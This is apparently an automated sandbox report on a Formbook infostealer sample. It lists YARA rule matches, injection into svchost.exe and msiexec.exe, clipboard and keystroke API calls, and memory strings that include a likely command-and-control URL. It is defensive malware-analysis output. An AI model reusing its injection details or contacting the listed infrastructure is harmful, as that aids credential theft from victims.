            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000049D4000.00000004.80000000.00040000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000051AE000.00000004.80000000.00040000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000006162000.00000004.80000000.00040000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005E3E000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.00000000065B2000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.000000000628E000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000004E24000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.00000000055FE000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4490874139.0000000007110000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2496207434.000000003BAE4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4490874139.0000000007110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.namesilo.com
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4490874139.0000000007110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.namesilo.com/domain/search-domains
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4490874139.0000000007110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.namesilo.com/whois
            Source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000057F6000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005C46000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.smokesandhoney.com/ld3u/?V6h=7cSyNGFy/S5quoM6udyikngV4L2ptvlq1/kf9BPZtTlwCENfjvle2IZfxcv
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F9EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00F9EAFF
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F9ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00F9ED6A
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F9EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00F9EAFF
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F8AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00F8AA57
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00FB9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00FB9576

            E-Banking Fraud

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4487941986.0000000002590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2202835266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2203112079.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4487732507.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4487977474.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4488832936.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4487941986.0000000002590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2202835266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2203112079.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4487732507.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4487977474.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4488832936.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0XLuA614VK.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: 0XLuA614VK.exe, 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_390a26df-f
            Source: 0XLuA614VK.exe, 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_20fb9ed2-4
            Source: 0XLuA614VK.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_d1805530-d
            Source: 0XLuA614VK.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d35dd759-e
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042B5A3 NtClose, | 2_2_0042B5A3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672B60 NtClose,LdrInitializeThunk, | 2_2_03672B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk, | 2_2_03672DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk, | 2_2_036735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03674340 NtSetContextThread, | 2_2_03674340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03674650 NtSuspendThread, | 2_2_03674650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672BE0 NtQueryValueKey, | 2_2_03672BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672BF0 NtAllocateVirtualMemory, | 2_2_03672BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672BA0 NtEnumerateValueKey, | 2_2_03672BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672B80 NtQueryInformationFile, | 2_2_03672B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672AF0 NtWriteFile, | 2_2_03672AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672AD0 NtReadFile, | 2_2_03672AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672AB0 NtWaitForSingleObject, | 2_2_03672AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672F60 NtCreateProcessEx, | 2_2_03672F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672F30 NtCreateSection, | 2_2_03672F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672FE0 NtCreateFile, | 2_2_03672FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672FA0 NtQuerySection, | 2_2_03672FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672FB0 NtResumeThread, | 2_2_03672FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672F90 NtProtectVirtualMemory, | 2_2_03672F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672E30 NtWriteVirtualMemory, | 2_2_03672E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672EE0 NtQueueApcThread, | 2_2_03672EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672EA0 NtAdjustPrivilegesToken, | 2_2_03672EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672E80 NtReadVirtualMemory, | 2_2_03672E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672D30 NtUnmapViewOfSection, | 2_2_03672D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672D00 NtSetInformationFile, | 2_2_03672D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672D10 NtMapViewOfSection, | 2_2_03672D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672DD0 NtDelayExecution, | 2_2_03672DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672DB0 NtEnumerateKey, | 2_2_03672DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672C60 NtCreateKey, | 2_2_03672C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672C70 NtFreeVirtualMemory, | 2_2_03672C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672C00 NtQueryInformationProcess, | 2_2_03672C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672CF0 NtOpenProcess, | 2_2_03672CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672CC0 NtQueryVirtualMemory, | 2_2_03672CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672CA0 NtQueryInformationToken, | 2_2_03672CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673010 NtOpenDirectoryObject, | 2_2_03673010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673090 NtSetValueKey, | 2_2_03673090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036739B0 NtGetContextThread, | 2_2_036739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673D70 NtOpenThread, | 2_2_03673D70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673D10 NtOpenProcessToken, | 2_2_03673D10
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04484650 NtSuspendThread,LdrInitializeThunk, | 4_2_04484650
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04484340 NtSetContextThread,LdrInitializeThunk, | 4_2_04484340
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482C60 NtCreateKey,LdrInitializeThunk, | 4_2_04482C60
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482C70 NtFreeVirtualMemory,LdrInitializeThunk, | 4_2_04482C70
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482CA0 NtQueryInformationToken,LdrInitializeThunk, | 4_2_04482CA0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482D10 NtMapViewOfSection,LdrInitializeThunk, | 4_2_04482D10
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482D30 NtUnmapViewOfSection,LdrInitializeThunk, | 4_2_04482D30
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482DD0 NtDelayExecution,LdrInitializeThunk, | 4_2_04482DD0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482DF0 NtQuerySystemInformation,LdrInitializeThunk, | 4_2_04482DF0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482EE0 NtQueueApcThread,LdrInitializeThunk, | 4_2_04482EE0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482F30 NtCreateSection,LdrInitializeThunk, | 4_2_04482F30
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482FE0 NtCreateFile,LdrInitializeThunk, | 4_2_04482FE0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482FB0 NtResumeThread,LdrInitializeThunk, | 4_2_04482FB0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482AD0 NtReadFile,LdrInitializeThunk, | 4_2_04482AD0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482AF0 NtWriteFile,LdrInitializeThunk, | 4_2_04482AF0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482B60 NtClose,LdrInitializeThunk, | 4_2_04482B60
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_044835C0 NtCreateMutant,LdrInitializeThunk, | 4_2_044835C0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_044839B0 NtGetContextThread,LdrInitializeThunk, | 4_2_044839B0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482C00 NtQueryInformationProcess, | 4_2_04482C00
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482CC0 NtQueryVirtualMemory, | 4_2_04482CC0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482CF0 NtOpenProcess, | 4_2_04482CF0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482D00 NtSetInformationFile, | 4_2_04482D00
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482DB0 NtEnumerateKey, | 4_2_04482DB0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482E30 NtWriteVirtualMemory, | 4_2_04482E30
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482E80 NtReadVirtualMemory, | 4_2_04482E80
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482EA0 NtAdjustPrivilegesToken, | 4_2_04482EA0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482F60 NtCreateProcessEx, | 4_2_04482F60
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482F90 NtProtectVirtualMemory, | 4_2_04482F90
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482FA0 NtQuerySection, | 4_2_04482FA0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482AB0 NtWaitForSingleObject, | 4_2_04482AB0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482BE0 NtQueryValueKey, | 4_2_04482BE0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482BF0 NtAllocateVirtualMemory, | 4_2_04482BF0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482B80 NtQueryInformationFile, | 4_2_04482B80
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04482BA0 NtEnumerateValueKey, | 4_2_04482BA0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04483010 NtOpenDirectoryObject, | 4_2_04483010
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04483090 NtSetValueKey, | 4_2_04483090
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04483D70 NtOpenThread, | 4_2_04483D70
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_04483D10 NtOpenProcessToken, | 4_2_04483D10
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_00138060 NtDeleteFile, | 4_2_00138060
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_001380F0 NtClose, | 4_2_001380F0
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_00137E20 NtCreateFile, | 4_2_00137E20
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_00137F80 NtReadFile, | 4_2_00137F80
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F8D5EB: CreateFileW,DeviceIoControl,CloseHandle, | 0_2_00F8D5EB
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F81201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, | 0_2_00F81201
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F8E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, | 0_2_00F8E8F6
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F28060 | 0_2_00F28060
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F92046 | 0_2_00F92046
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F88298 | 0_2_00F88298
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F5E4FF | 0_2_00F5E4FF
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F5676B | 0_2_00F5676B
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00FB4873 | 0_2_00FB4873
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F2CAF0 | 0_2_00F2CAF0
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F4CAA0 | 0_2_00F4CAA0
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F3CC39 | 0_2_00F3CC39
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F56DD9 | 0_2_00F56DD9
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F291C0 | 0_2_00F291C0
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F3B119 | 0_2_00F3B119
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F41394 | 0_2_00F41394
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F41706 | 0_2_00F41706
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F4781B | 0_2_00F4781B
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F419B0 | 0_2_00F419B0
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F3997D | 0_2_00F3997D
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F27920 | 0_2_00F27920
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F47A4A | 0_2_00F47A4A
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F47CA7 | 0_2_00F47CA7
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F41C77 | 0_2_00F41C77
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F59EEE | 0_2_00F59EEE
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00FABE44 | 0_2_00FABE44
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F41F32 | 0_2_00F41F32
            Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_011635F0 | 0_2_011635F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041006A | 2_2_0041006A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00410073 | 2_2_00410073
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401120 | 2_2_00401120
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042D9C3 | 2_2_0042D9C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004169E3 | 2_2_004169E3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403210 | 2_2_00403210
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00410293 | 2_2_00410293
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E313 | 2_2_0040E313
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004024B0 | 2_2_004024B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402770 | 2_2_00402770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FA352 | 2_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E3F0 | 2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037003E6 | 2_2_037003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0274 | 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C02C0 | 2_2_036C02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C8158 | 2_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03630100 | 2_2_03630100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DA118 | 2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F81CC | 2_2_036F81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F41A2 | 2_2_036F41A2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037001AA | 2_2_037001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D2000 | 2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640770 | 2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03664750 | 2_2_03664750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363C7C0 | 2_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365C6E0 | 2_2_0365C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640535 | 2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03700591 | 2_2_03700591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F2446 | 2_2_036F2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E4420 | 2_2_036E4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EE4F6 | 2_2_036EE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FAB40 | 2_2_036FAB40
